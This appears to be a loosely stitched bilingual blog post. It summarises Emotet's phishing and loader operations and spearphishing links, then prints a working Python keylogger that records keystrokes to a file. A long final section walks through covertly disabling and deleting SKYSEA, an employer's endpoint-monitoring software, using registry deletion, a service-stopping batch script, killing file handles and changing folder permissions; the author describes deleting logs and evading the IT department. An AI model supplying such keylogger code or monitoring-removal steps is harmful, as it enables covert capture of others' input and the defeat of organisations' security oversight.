Research of Emotet
Spread via Word documents
通过 Word 文档传播
The EMOTET group managed to take email as an attack vector to a next level. Through a fully automated process, EMOTET malware was delivered to the victims’ computers via infected e-mail attachments. A variety of different lures were used to trick unsuspecting users into opening these malicious attachments. In the past, EMOTET email campaigns have also been presented as invoices, shipping notices and information about COVID-19.
All these emails contained malicious Word documents, either attached to the email itself or downloadable by clicking on a link within the email itself. Once a user opened one of these documents, they could be prompted to “enable macros” so that the malicious code hidden in the Word file could run and install EMOTET malware on a victim’s computer.
EMOTET 群体成功将电子邮件作为攻击向量提升到了一个新水平。通过完全自动化的过程,EMOTET 恶意软件通过感染的电子邮件附件传递到受害者的计算机上。各种不同的诱饵被用来欺骗毫无戒备的用户打开这些恶意附件。过去,EMOTET 的电子邮件活动也曾被伪装成发票、运输通知和有关 COVID-19 的信息。
所有这些电子邮件都包含恶意的 Word 文档,文档要么附在电子邮件中,要么通过点击邮件中的链接下载。一旦用户打开了这些文档,他们可能会被提示『启用宏』,以便隐藏在 Word 文件中的恶意代码可以运行,并在受害者的计算机上安装 EMOTET 恶意软件。
Attacks for hire
雇佣攻击
EMOTET was much more than just a malware. What made EMOTET so dangerous is that the malware was offered for hire to other cybercriminals to install other types of malware, such as banking Trojans or ransomwares, onto a victim’s computer.
This type of attack is called a ‘loader’ operation, and EMOTET is said to be one of the biggest players in the cybercrime world as other malware operators like TrickBot and Ryuk have benefited from it.
Its unique way of infecting networks by spreading the threat laterally after gaining access to just a few devices in the network made it one of the most resilient malware in the wild.
EMOTET 不仅仅是一种恶意软件。EMOTET 之所以危险,是因为它被提供给其他网络犯罪分子,用于在受害者的计算机上安装其他类型的恶意软件,如银行木马或勒索软件。
这种类型的攻击被称为『加载程序』操作,EMOTET 被认为是网络犯罪世界中的最大玩家之一,因为其他恶意软件操作员如 TrickBot 和 Ryuk 从中受益。
它通过在网络中获得访问权限后横向传播威胁的独特方式,使其成为最具弹性的恶意软件之一。
Emotet Malware
Emotet 恶意软件
Phishing: Spearphishing Link
网络钓鱼:带有恶意链接的鱼叉式钓鱼
Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
All forms of spearphishing are electronically delivered social engineering targeted at a specific individual, company, or industry. In this case, the malicious emails contain links. Generally, the links will be accompanied by social engineering text and require the user to actively click or copy and paste a URL into a browser, leveraging User Execution. The visited website may compromise the web browser using an exploit, or the user will be prompted to download applications, documents, zip files, or even executables depending on the pretext for the email in the first place. Adversaries may also include links that are intended to interact directly with an email reader, including embedded images intended to exploit the end system directly or verify the receipt of an email (i.e. web bugs/web beacons). Links may also direct users to malicious applications designed to Steal Application Access Tokens, like OAuth tokens, in order to gain access to protected applications and information.
对手可能会发送带有恶意链接的鱼叉式钓鱼电子邮件,试图获取敏感信息或访问受害者的系统。带有链接的鱼叉式钓鱼是一种特定变体,与其他形式的鱼叉式钓鱼不同,它使用链接来下载电子邮件中的恶意软件,而不是将恶意文件附加到电子邮件中,以避开可能检查电子邮件附件的防御。
所有形式的鱼叉式钓鱼都是针对特定个人、公司或行业的电子社交工程。在这种情况下,恶意电子邮件包含链接。通常,这些链接会伴有社交工程文本,要求用户主动点击或复制并粘贴 URL 到浏览器中,利用用户执行。访问的网站可能会通过利用漏洞来危害浏览器,或者根据电子邮件的背景提示用户下载应用程序、文档、压缩文件甚至可执行文件。对手还可能包括旨在直接与电子邮件阅读器交互的链接,包括旨在直接利用最终系统的嵌入式图像或验证电子邮件接收的 Web 僵尸(即 Web Bugs/Web Beacons)。链接还可能将用户引导到旨在窃取应用程序访问令牌(如 OAuth 令牌)的恶意应用程序中,以获得对受保护应用程序和信息的访问权限。
Keylogger
键盘记录器
python -m pip install pynput
from pynput import keyboard
log_file = 'keylog.txt'
def on_press(key: keyboard.Key | keyboard.KeyCode | None) -> None:
with open(log_file, 'a') as f:
f.write(f'[{key}]')
with keyboard.Listener(on_press=on_press) as listener:
listener.join()
How to detect keyloggers?
Detecting keylogger programs on a computer usually involves fairly obvious warning signs: the browser slows down, there are delays when moving the mouse or typing, or the cursor disappears. Even if you use the best privacy browsers, keyloggers can still track your inputs.
How keyloggers infect your device?
Hackers often use social engineering methods to infect victims with keyloggers. A keylogger can infect your device in different ways, sometimes depending on your device type. And even though a spyware removal tool can handle keystroke logger detection, you want to avoid this dangerous type of malware to begin with.
Here’s the general process for how a keylogger infects your device:
A cybercriminal sends an infected phishing message, usually through an email attachment, SMS message, or infected website.
When you click the link for the infected website or attachment, the keylogger automatically downloads itself onto your device.
The keystroke tracker immediately starts to collect your keystrokes, most likely without being detected until you run a keylogger scan.
如何检测键盘记录器?
检测计算机上键盘记录器程序的警告信号通常相当明显:浏览器变慢、鼠标移动或键击时出现延迟,或者光标消失。即使你使用最好的隐私浏览器,键盘记录器也能跟踪你的输入。
键盘记录器如何感染你的设备?
黑客通常使用社会工程学方法来感染受害者的设备。键盘记录器可以通过多种方式感染你的设备,这些方式有时取决于你的设备类型。虽然间谍软件清除工具可以处理键盘记录器的检测,但最好的办法是从一开始就避免这种危险的恶意软件。
以下是键盘记录器感染你设备的一般过程:
网络犯罪分子发送带有感染的钓鱼信息,通常通过电子邮件附件、短信或感染的网站进行发送。
当你点击感染网站的链接或附件时,键盘记录器会自动下载到你的设备上。
键盘记录器立即开始收集你的按键输入,通常在你运行键盘记录器扫描之前不会被发现。
SKYSEA 这个间谍软件的删除方法
一、详细操作指南
社内PC上未经允许安装并获取操作日志的麻烦间谍软件。让我们根除这个间谍软件,提高生活质量(QOL)。
使用 RegistryFinder 删除注册表中所有包含 “skysea” 的项。也可以使用 regedit,但比较麻烦。
删除注册表中 Key 列和 Value 列中包含 “SKYSEA” 的记录(右键点击 → 从注册表中删除)。
通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “Swd” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。
删除 C:\WINDOWS 目录中的 “wds” 文件夹。
通过资源管理器右键点击 PC → 管理 → 左侧树状图中的 服务和应用程序 → 服务中的 “awssm” 右键点击 → 属性 → 将服务状态设置为停止,将启动类型设置为禁用。
删除 C:\WINDOWS 目录中的 “awssm” 文件夹。
将以下文本保存为 .bat 文件并运行。也可以手动停止和禁用服务。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25@echo off
rem 禁用服务
sc config "Swd" start= disabled
sc config "awssm" start= disabled
sc config "SCVCabProxySvr" start= disabled
sc config "CompactSvc" start= disabled
sc config "ScvUpdSvc" start= disabled
sc config "AstExAgt" start= disabled
sc config "ScvSvc" start= disabled
sc config "SCV LogAgentService" start= disabled
sc config "LogSvr" start= disabled
sc config "IceSvc" start= disabled
rem 停止服务
net stop "Swd"
net stop "awssm"
net stop "SCVCabProxySvr"
net stop "CompactSvc"
net stop "ScvUpdSvc"
net stop "AstExAgt"
net stop "ScvSvc"
net stop "SCV LogAgentService"
net stop "LogSvr"
net stop "IceSvc"因为各服务会进行活性监控,需要多次运行 bat 文件来完全停止它们。如果不行的话可以手动从服务界面停止。
打开任务管理器,右键点击 “SKYSEA Client View Version 16.1” → 结束任务。然后删除 C:\Program Files (x86) 目录中的 “Sky Product” 文件夹。如果无法删除,可能是服务未完全停止或者任务管理器中还有 “SKYSEA Client View Version 16.1”。
重启电脑,如果任务管理器中没有任何与 “SKYSEA” 相关的进程,说明删除成功。
结束监视社会。感谢这家公司,我连藤原竜也都讨厌了。
2023年10月15日更新
在多次停止服务后,系统部门又说『日志无法获取了』,我反复说『请远程安装』,然后删除了日志。但随着新版本的发布,他们要求重新安装。我本来不想安装,但最后不得不安装。安装后,他们又说『日志无法获取』,但我不在乎。
后来我再次尝试删除这个恶心的间谍软件,但 “C:\Program Files (x86)\Sky Product\SKYSEA Client View” 文件夹被占用,无法删除。因为不想查找具体是哪项服务占用,于是按照以下步骤进行处理:
- 右键点击 Windows 标志,选择 “运行”。
- 输入 “resmon.exe” 并点击 “确定”。
- 在资源监视器中,打开 “CPU” 选项卡。
- 展开 “关联的句柄” 部分。
- 在 “关联的句柄” 搜索框中输入 “SKYSEA Client View”。
- 等待搜索结果显示。
- 右键点击显示的进程,选择 “结束进程”。
即便是 Chrome 和 Outlook 也受到影响,这太恶心了。想到系统部门的老男人可能会窥探女性员工的搜索历史,真是太可怕了。
无法删除文件夹时,可以参考以下 URL,通过移除 administrators 权限并授予 everyone 完全控制权限来删除文件夹:
二、服务停止与启动脚本
昨天写的删除方法,其实不用删除注册表也可以停止服务。但是,如果想彻底清理,建议删除注册表项目。
因为有些公司可能会在删除后抱怨,所以我创建了停止和启动服务的 bat 文件。请在自担风险下使用。
服务停止.bat
1 | @echo off |
服务启动.bat
1 | @echo off |